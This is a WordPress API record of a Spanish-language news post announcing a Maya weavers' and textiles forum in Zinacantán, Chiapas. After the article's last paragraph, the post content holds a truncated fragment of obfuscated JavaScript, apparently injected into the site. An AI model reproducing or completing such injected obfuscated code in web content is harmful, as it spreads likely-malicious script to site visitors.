{"id":10901,"date":"2023-07-08T04:53:47","date_gmt":"2023-07-08T04:53:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10901"},"modified":"2023-07-08T04:53:48","modified_gmt":"2023-07-08T04:53:48","slug":"se-realizara-primer-foro-de-tejedoras-y-textiles-mayas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10901","title":{"rendered":"Se realizar\u00e1 Primer Foro de Tejedoras y Textiles Mayas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688791880883-1024x683.jpg\" alt=\"\" class=\"wp-image-10902\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688791880883-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688791880883-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688791880883-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688791880883.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>07 de Julio del 2023. San Crist\u00f3bal de Las Casas.- Con el objetivo del Foro de vincular y estrechar lazos de convivencia a trav\u00e9s de las tejedoras, reconociendo su oficio, arte e identidad cultural, mediante diferentes expresiones tangibles, intercambiando experiencias, se realizar\u00e1 el Primer Foro de Tejedoras y Textiles Mayas, en el municipio de Zinacant\u00e1n el pr\u00f3ximo 14 de julio a las 9:30 de la ma\u00f1ana.<\/p>\n\n\n\n<p>Al respecto, la Universidad Intercultural de Chiapas (UNICH), dio a conocer que a trav\u00e9s del cuerpo Acad\u00e9mico 06 Estudios de G\u00e9nero e Interculturalidad, y Nich Chiapas, Sociedad Cooperativa de Tejedoras Mayas (Sbabial Tsoblejal Jolobiletik Xchi \u0301uk Bats \u0301i Poketik, Yu \u0301un Bats \u0301i \u0301antsetik), el pr\u00f3ximo 14 de julio se realizar\u00e1n diversas actividades en aquel municipio Tsotsil.<\/p>\n\n\n\n<p>Buscan que mediante un conversatorio se evidencie de manera testimonial los procesos y cambios que han sufrido las t\u00e9cnicas de producir y\/o elaborar productos artesanales \u201choy en d\u00eda y que insertan la participaci\u00f3n de la mujer en actividades que permiten aportar econ\u00f3micamente en los ingresos familiares y mejora en la calidad de vida\u201d.<\/p>\n\n\n\n<p>\u201cEs por ello que el CA-06 Estudios de G\u00e9nero e Interculturalidad y NICH Chiapas, AC, han organizado un encuentro en el que se escuchen las voces de las tejedoras y con el paso del tiempo pueda consolidarse, incrementando la participaci\u00f3n de m\u00e1s mujeres que se dedican espec\u00edficamente al arte textil\u201d, indican los organizadores.<\/p>\n\n\n\n<p>Dentro de las participaciones est\u00e1n la Conferencia magistral en su modalidad virtual, del Textil Maya de Chiapas Hoy, por la Antrop\u00f3loga, Marta Turok; ponencias, conversatorios, muestra de textiles, muestra de trajes de mujeres, hombres y ni\u00f1as de los pueblos originarios, muestra gastron\u00f3mica y degustaci\u00f3n de platillos de la Regi\u00f3n, entre otras actividades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 07 de Julio del 2023. San Crist\u00f3bal de Las Casas.- Con el objetivo del Foro de vincular y estrechar lazos de convivencia a trav\u00e9s de las tejedoras, reconociendo su oficio, arte e identidad cultural, mediante diferentes expresiones tangibles, intercambiando experiencias, se realizar\u00e1 el Primer Foro de Tejedoras y Textiles Mayas, en el municipio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10902,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10901","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10901","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10901"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10901\/revisions"}],"predecessor-version":[{"id":10903,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10901\/revisions\/10903"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10902"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10901"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10901"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10901"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}